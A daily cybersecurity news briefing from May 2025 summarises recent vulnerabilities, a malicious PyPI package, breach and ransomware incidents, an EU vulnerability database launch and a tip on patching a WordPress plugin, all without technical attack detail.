May 14, 2025 – Cyber Briefing

👉 What’s trending in cybersecurity today?

A PHP Object Injection vulnerability in Uncanny Automator, while a fake Solana PyPI package targets developers. Microsoft patched a critical Linux Defender bug, Alabama faces a cybersecurity incident, and Hong Kong’s Drug Safety Center was hit by ransomware. The EU launched a new vulnerability database, data breaches in Australia hit a five-year high, and Google Intel released guides to detect malicious files.

Listen to the full podcast

🚨 Cyber Alerts

1. Uncanny Automator Bug Risks WordPress Sites

A critical PHP Object Injection vulnerability was discovered in the Uncanny Automator WordPress plugin, a tool active on over 50,000 websites. This security flaw could allow authenticated attackers, even those with minimal subscriber-level access, to delete vital files like wp-config.php, potentially leading to full site takeover and remote code execution. All users are strongly advised to update to this latest version immediately to protect their sites, while Wordfence customers have already started receiving firewall protection against this specific threat.

2. Devs Hit By PyPI Solana Token Secret Theft

A malicious package named “solana-token” was discovered on the Python Package Index (PyPI). Disguised as a Solana blockchain tool, it actually stole source code and developer secrets, affecting 761 downloads before removal. The malware specifically targeted developers creating their own blockchains by attempting to exfiltrate sensitive crypto-related data. This incident underscores the persistent supply chain threats in software, urging developers to meticulously scrutinize all third-party packages.

3. Microsoft Defender Bug Allows SYSTEM Access

A security flaw, CVE-2025–26684, was discovered in Microsoft Defender for Endpoint on Linux systems. This vulnerability allowed authenticated local attackers to elevate their privileges to SYSTEM level, gaining complete control. Microsoft addressed this Important severity flaw as part of its May 2025 Patch Tuesday updates released May 13th. Organizations using affected Linux versions are strongly advised to apply the security update immediately.

For more alerts, click here!

Click to See Jobs

💥 Cyber Incidents

4. Alabama Cybersecurity Event Hits Services

Alabama is responding to a cybersecurity incident that disrupted government services and website access. Governor Kay Ivey confirmed that some employee credentials were compromised but no resident data was stolen. The Office of Information Technology is investigating with help from a third-party cybersecurity firm. Officials urged caution with emails and continue working to contain the incident’s full impact.

5 . Andy Frain Data Breach Impacts 100k People

Andy Frain Services notified over 100,000 individuals about an October 2024 data breach that compromised personal information. The ransomware group Black Basta claimed responsibility for stealing 750 GB of data, though the company has not confirmed this. Experts expressed concern over the nearly seven-month delay in notifying those affected by the security incident. Andy Frain Services has not yet detailed the breach’s cause or provided specific guidance to the impacted individuals.

6. Hong Kong DSC Hit By Ransomware Attack

Hong Kong’s Drug Safety Testing Center, under HKSTP, experienced a malicious ransomware attack on its computer systems on May 12th. This security incident compromised data belonging to approximately 30 employees and 20 customers of the center. The Drug Safety Testing Center immediately isolated affected servers, activated an incident task force, and reported the breach to Hong Kong police and relevant authorities. HKSTP is fully cooperating with the police investigation and has engaged an independent cybersecurity expert for review and remediation.

For more incidents, click here!

Click to See Tools

📢 Cyber News

7. New EU Vulnerability Database Launched

The European Union has launched its new vulnerability database, the European Union Vulnerability Database (EUVD), developed by ENISA since the NIS2 Directive. This beta launch in mid-April occurred amid uncertainty about the future operation of MITRE’s CVE Program. The EUVD will provide aggregated, actionable information on ICT vulnerabilities, including their exploitation status and mitigation measures. Meanwhile, a new CVE Foundation has emerged aiming for a nonprofit model, and CISA has affirmed its commitment to the CVE program’s stability.

8. Aussie Data Breach Reports Hit 5 Year High

Australia experienced its highest number of reported data breaches this decade in late 2024, with 527 notifications. The Office of the Australian Information Commissioner (OAIC) report revealed malicious attacks like ransomware and compromised credentials drove most incidents. Health and government sectors were prime targets, alongside rising supply chain breaches and significant human error. Concerningly, the OAIC noted over a quarter of organizations significantly delayed their mandatory breach notifications.

9. Google Hunts Malicious Linux Desktop Files

Google Threat Intelligence has launched a new blog series to share advanced threat hunting techniques with security professionals. The initial focus is on detecting malicious .desktop files on Linux systems, which attackers use to hide malicious commands. These files often employ decoy PDF documents hosted on Google Drive to distract victims while malware downloads. Google provides several query-based hunting strategies to help defenders proactively identify and combat these evolving threats.

For more news, click here

📈Cyber Stocks

💡 Cyber Tip

Update Uncanny Automator Plugin Immediately

A critical vulnerability has been discovered in the Uncanny Automator WordPress plugin, used on over 50,000 sites. This flaw could allow attackers with even the lowest level of access (like subscribers) to delete sensitive files such as wp-config.php, potentially resulting in a complete site takeover and remote code execution.

Actions You Should Take:

Update the plugin immediately to the latest patched version from the WordPress plugin repository.
Check your site for unauthorized users, especially new subscribers or unusual accounts.
Review your server files (e.g., wp-config.php) for any signs of tampering or deletion.
Enable a Web Application Firewall
Back up your site regularly, especially before applying security patches.

Why it matters: Low-level user accounts can be exploited, this means even a simple subscriber could trigger the attack. If successful, attackers can delete configuration files, disabling your site or enabling further compromise.